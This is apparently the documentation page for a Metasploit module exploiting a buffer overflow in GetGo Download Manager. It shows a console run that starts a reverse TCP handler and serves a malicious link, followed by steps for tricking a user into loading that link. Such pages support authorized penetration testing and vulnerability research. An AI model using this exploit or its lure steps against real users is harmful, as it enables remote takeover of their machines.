31 lines
1.3 KiB
Markdown
31 lines
1.3 KiB
Markdown
|
## Description
|
||
|
|
|
||
|
|
This modules adds a buffer overflow exploit for GetGo Download Manager, which supports
|
||
|
|
4.9.0.1982 and 5.3.0.2712. Versions prior should also be vulnerable.
|
||
|
|
|
||
|
|
This exploit has been tested on Windows XP SP3. The vulnerable software can be downloaded
|
||
|
|
at [GetGo Download Manager 5.3.0.2712](https://www.exploit-db.com/apps/b26d82eadef93531f8beafac6105ef13-GetGoDMSetup.exe)
|
||
|
|
|
||
|
|
To use this, first start the module like the following example:
|
||
|
|
|
||
|
|
```
|
||
|
|
msf5 exploit(windows/browser/getgodm_http_response_bof) > run
|
||
|
|
[*] Exploit running as background job 0.
|
||
|
|
[*] Exploit completed, but no session was created.
|
||
|
|
|
||
|
|
[*] Started reverse TCP handler on 192.168.0.12:4444
|
||
|
|
msf5 exploit(windows/browser/getgodm_http_response_bof) > [*] Using URL: http://0.0.0.0:8080/shakeitoff.mp3
|
||
|
|
[*] Local IP: http://192.168.0.12:8080/shakeitoff.mp3
|
||
|
|
[*] Server started.
|
||
|
|
```
|
||
|
|
|
||
|
|
The exploit should give you a fake link. Pass this link to the Getgo user, and instruct them to
|
||
|
|
do the following:
|
||
|
|
|
||
|
|
1. Start GetGo Download Manager
|
||
|
|
2. Click on the DOWNLOAD button
|
||
|
|
3. Click on New (if the link is already copied to the clipboard, clicking on this should trigger
|
||
|
|
the download, and get exploited).
|
||
|
|
4. If the link isn't in the clipboard, instruct the user to enter the URL in the URL field, and
|
||
|
|
click OK. The user should also get exploited this way.
|